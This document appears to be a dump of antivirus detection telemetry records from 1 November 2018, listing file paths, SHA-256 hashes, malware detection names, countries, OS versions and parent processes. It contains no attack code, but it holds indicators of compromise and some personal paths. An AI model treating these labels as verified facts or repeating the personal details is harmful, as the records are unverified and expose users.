  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:25:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='37e3355abaf8acf4a26f004c5af5fb2f27a77d912d7f74c3a7ad2762518342bc.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\37E3355ABAF8ACF4A26F004C5AF5FB2F27A77D912D7F74C3A7AD2762518342BC.VIR', filesize=1184000, name='TR/Dldr.Delphi.Gen.#M300.#R3195'), hash='37e3355abaf8acf4a26f004c5af5fb2f27a77d912d7f74c3a7ad2762518342bc', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:30:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A3000H\\Lenovo_A3000H_MT6589_A422_003_014_130909\\Lenovo_A3000H_MT6589_A422_003_014_130909\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='3af5690cefb52b2ccdc69fb604f231a6c85573e82ef01a8fa2813ed12f5ad187', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ev~nen^e.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Ev~NeN^e.eXe', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155149-97808478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155149-97808478', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161235-b162c3f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-161235-B162C3F1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:10:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160038-f08991f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160038-F08991F6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:44:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T21:42:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:26:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='c:\\users\\X\\downloads\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:35:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epifani-2012.exe', filepath='F:\\Messe-Meyer\\Epifani-2012.exe', filesize=256000, name='TR/Crypt.ZPACK.Gen.#M300.#R2976'), hash='bfa4005134c36fc713f28923895a1d487ad883ee9892ed6e53004eb95f9f95dc', metadata=Row(cmdline='rtp', country='HT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-01T18:56:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mp3 converter.exe', filepath='G:\\MP3 Converter.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:32:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122049-523c77c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121942-193EA754\\AVSCAN-20181101-122049-523C77C2', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9f46b92db2c2ccc0bc9d7adecbb9bc6da88322375d0607a4b6b5610ad7c89120', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\9F46B92DB2C2CCC0BC9D7ADECBB9BC6DA88322375D0607A4B6B5610AD7C89120', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='9f46b92db2c2ccc0bc9d7adecbb9bc6da88322375d0607a4b6b5610ad7c89120', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:25:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ed6657bb0d0bdfe64632ddbc923baa2583872fd76ef291cc757019a27f0901b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\ED6657BB0D0BDFE64632DDBC923BAA2583872FD76EF291CC757019A27F0901B4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ed6657bb0d0bdfe64632ddbc923baa2583872fd76ef291cc757019a27f0901b4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsu3241.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-01T07:09:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110050-adeec8ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110050-ADEEC8EE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123635-79528eae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123614-67FFD031\\AVSCAN-20181101-123635-79528EAE', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:36:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nss9C09.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T09:31:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vichrova_anastasija.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Vichrova_Anastasija.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='8ae0549ba3ebca1312a0e25fff7693cfe887a2cf59ba78cacd42a4074b7c1b9d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='a6eb09249cddf02dc0bbeb22ae11147b0941409a60cc407c298def3c748e0405', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-01T19:14:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.mobisystems.fonts.exe', filepath='G:\\Android\\data\\com.mobisystems.fonts.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:53:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111952-3debd7ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111952-3DEBD7BA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mytransfer (1).exe', filepath='E:\\WINDOWS\\Desktop\\MyTransfer (1).exe', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='b39e00e952ed7c52f2cdc537e8eb5b45ba3a589b8b24b11229aa872a31c1694d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:04:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Windows\\System32\\DriverStore\\FileRepository\\hdart.inf_x86_neutral_19825fd7f8bfb7f8\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='66a1a8a6501bf73a145118d6843a4f9dd2a397035c65cbccc91422dc3dc394fa', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:14:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A7000\\Lenovo_A7000_S233_MT6752_6.0_(by_firmwarefile.com)\\Lenovo_A7000_S233_MT6752_6.0\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='57aa8e6c7f17c5f2f2919e97e80ed839e6e24f62858582bef3ce55fcf0e32e70', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T12:45:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsn7A7E.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T16:51:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='8bc02e467dd9d260328f23b822e47ad7cfcb39d072d1a477540732be0b689f2b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000717-c0396ce2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28e34e72\\AVSCAN-20181101-234504-1DD013D9\\AVSCAN-20181102-000717-C0396CE2', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='play cracked.exe', filepath='D:\\=\\Minecraft - Collection\\play cracked.exe', filesize=192000, name='TR/Rogue.192000.9.#M1.#R1'), hash='767e7cef883679bed2576504ca4cf079d8cf48360f85e2d79fc4d41f73a2610e', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$2500E0,54272,0,F:\\\\\\\\setup.exe\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-VC23S.tmp\\setup.tmp', parentsize=902144, timestamp='2018-11-01T07:50:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msjuf.exe', filepath='\\\\?\\C:\\ProgramData\\msjuf.exe', filesize=90272000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='45c50956ac0811e969ca3da776e15d6ac52e6e3454bd7198118d10d9f7a7f676', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:46:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190921-d5d5295b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71961630\\AVSCAN-20181101-190907-D3A5EF12\\AVSCAN-20181101-190921-D5D5295B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='0a70b4ac5696c29974714d71cc22b89bdf927c6cd18800951b07d7c02fcc9453', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftw.exe', filepath='C:\\Users\\X\\Documents\\stan\\My Documents\\FTW\\FTW.EXE', filesize=3520000, name='W32/Neshta.A.#M1.#R1'), hash='4c57a3b55e59dd813ef31340bbbb198c2890410e32d2d812755853b38f447e1d', metadata=Row(cmdline='\\\\\\/864A627C-C6B2-464A-AA13-25D62F282BD8 ', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\IT_2\\_Downloads22\\_Portable\\Portable Wondershare Video Converter Ultimate 9.0.4.0 Multilingual\\Wondershare Video Converter Ultimate 9.0.4.0 Portable\\App\\local\\stubexe\\0xF20480E8788E3F81\\WSVCUSplash.exe', parentsize=26712, timestamp='2018-11-01T16:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002148-340f33d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002148-340F33D7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002323-3e5cf2fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002323-3E5CF2FD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc54f3ee21-b231-0f49-a3bc-b70a54ef7be7.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc54F3EE21-B231-0F49-A3BC-B70A54EF7BE7.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.559\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.559\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:58:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235506-a0b451e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24a42098\\AVSCAN-20181101-235317-95E41070\\AVSCAN-20181101-235506-A0B451E9', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:55:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='390b66c97531da93cf5d9e03bca80fd2961e33c95df0b14a58b4c0114a764294', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\390B66C97531DA93CF5D9E03BCA80FD2961E33C95DF0B14A58B4C0114A764294', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='390b66c97531da93cf5d9e03bca80fd2961e33c95df0b14a58b4c0114a764294', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:26:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:27:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:24:50Z'), dt=datetime.date(2018, 11, 1)),
